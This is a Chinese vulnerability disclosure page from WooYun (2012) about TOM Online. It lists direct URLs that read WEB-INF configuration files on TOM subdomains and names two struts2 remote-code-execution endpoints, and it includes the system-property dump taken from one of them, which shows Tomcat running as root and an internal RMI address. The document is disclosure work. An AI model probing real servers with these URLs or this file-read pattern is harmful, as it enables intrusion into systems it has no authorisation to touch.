当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013723

漏洞标题:j2ee分层架构安全(注册乌云1周年庆祝集锦) -- TOM

相关厂商:TOM在线

漏洞作者: shine

提交时间:2012-10-24 11:45

修复时间:2012-12-08 11:46

公开时间:2012-12-08 11:46

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-10-24: 细节已通知厂商并且等待厂商处理中
2012-10-27: 厂商已经确认,细节仅向厂商公开
2012-11-06: 细节向核心白帽子及相关领域专家公开
2012-11-16: 细节向普通白帽子公开
2012-11-26: 细节向实习白帽子公开
2012-12-08: 细节向公众公开

简要描述:

RT!

详细说明:

首先看一个以前典型的case:
   WooYun: 去哪儿任意文件读取(基本可重构该系统原工程) 
  或哥这篇粗糙的文章:
http://hi.baidu.com/shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html

漏洞证明:


http://search.auto.tom.com/WEB-INF/web.xml
http://search.auto.tom.com/WEB-INF/classes/beans.xml
http://data.auto.tom.com/WEB-INF/classes/beans.xml


(抱歉!抱歉!发现前面上错图了,更正一下!)



附带两struts2远程代码执行漏洞:
http://637.tom.com/login-share/logout/logout.action
http://englishok.tom.com/club/clubShow.action


/data/apache-tomcat-6.0.26/webapps/login-share
java.home: /usr/local/jdk1.6.0_25/jre
java.version: 1.6.0_25
os.name: Linux
os.arch: i386
os.version: 2.6.32-5-686-bigmem
user.name: root
user.home: /root
user.dir: /data/apache-tomcat-6.0.26/bin
java.class.version: 50.0
java.class.path: /data/apache-tomcat-6.0.26/bin/bootstrap.jar
java.library.path: /usr/local/jdk1.6.0_25/jre/lib/i386/server:/usr/local/jdk1.6.0_25/jre/lib/i386:/usr/local/jdk1.6.0_25/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 20.0-b11
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) Server VM
java.specification.version: 1.6
java.specification.vender: 
java.specification.name: Java Platform API Specification
java.io.tmpdir: /data/apache-tomcat-6.0.26/temp
hibernate信息
-- listing properties --
java.runtime.name=Java(TM) SE Runtime Environment
sun.boot.library.path=/usr/local/jdk1.6.0_25/jre/lib/i386
java.vm.version=20.0-b11
shared.loader=
java.vm.vendor=Sun Microsystems Inc.
java.vendor.url=http://java.sun.com/
path.separator=:
java.vm.name=Java HotSpot(TM) Server VM
tomcat.util.buf.StringCache.byte.enabled=true
file.encoding.pkg=sun.io
java.util.logging.config.file=/data/apache-tomcat-6.0.26/conf/loggi...
user.country=US
sun.java.launcher=SUN_STANDARD
sun.os.patch.level=unknown
java.vm.specification.name=Java Virtual Machine Specification
user.dir=/data/apache-tomcat-6.0.26/bin
java.runtime.version=1.6.0_25-b06
java.awt.graphicsenv=sun.awt.X11GraphicsEnvironment
java.endorsed.dirs=/data/apache-tomcat-6.0.26/endorsed
os.arch=i386
java.io.tmpdir=/data/apache-tomcat-6.0.26/temp
line.separator=
java.vm.specification.vendor=Sun Microsystems Inc.
java.util.logging.manager=org.apache.juli.ClassLoaderLogManager
java.naming.factory.url.pkgs=org.apache.naming
os.name=Linux
sun.jnu.encoding=UTF-8
java.library.path=/usr/local/jdk1.6.0_25/jre/lib/i386/s...
java.specification.name=Java Platform API Specification
java.class.version=50.0
java.naming.provider.url=rmi://172.24.203.160:9199
sun.management.compiler=HotSpot Tiered Compilers
os.version=2.6.32-5-686-bigmem
user.home=/root
user.timezone=Asia/Shanghai
catalina.useNaming=true
java.awt.printerjob=sun.print.PSPrinterJob
java.specification.version=1.6
file.encoding=UTF-8
catalina.home=/data/apache-tomcat-6.0.26
user.name=root
java.class.path=/data/apache-tomcat-6.0.26/bin/bootst...
jboss.remoting.version=22
hibernate.bytecode.use_reflection_optimizer=false
java.naming.factory.initial=com.sun.jndi.rmi.registry.RegistryCon...
package.definition=sun.,java.,org.apache.catalina.,org.a...
java.vm.specification.version=1.0
sun.arch.data.model=32
java.home=/usr/local/jdk1.6.0_25/jre
sun.java.command=org.apache.catalina.startup.Bootstrap...
java.specification.vendor=Sun Microsystems Inc.
user.language=en
java.vm.info=mixed mode
java.version=1.6.0_25
java.ext.dirs=/usr/local/jdk1.6.0_25/jre/lib/ext:/u...
sun.boot.class.path=/usr/local/jdk1.6.0_25/jre/lib/resour...
java.vendor=Sun Microsystems Inc.
server.loader=
catalina.base=/data/apache-tomcat-6.0.26
file.separator=/
java.vendor.url.bug=http://java.sun.com/cgi-bin/bugreport...
common.loader=${catalina.base}/lib,${catalina.base}...
sun.cpu.endian=little
sun.io.unicode.encoding=UnicodeLittle
package.access=sun.,org.apache.catalina.,org.apache....
sun.cpu.isalist=

修复方案:

如上!

版权声明:转载请注明来源 shine@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2012-10-27 08:36

厂商回复:

添加对漏洞的补充说明以及做出评价的理由

最新状态:

暂无

漏洞评价:

评论

  1. 2012-10-25 12:59 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @xsser 麻烦管理员更新一下,发现这个上错图了!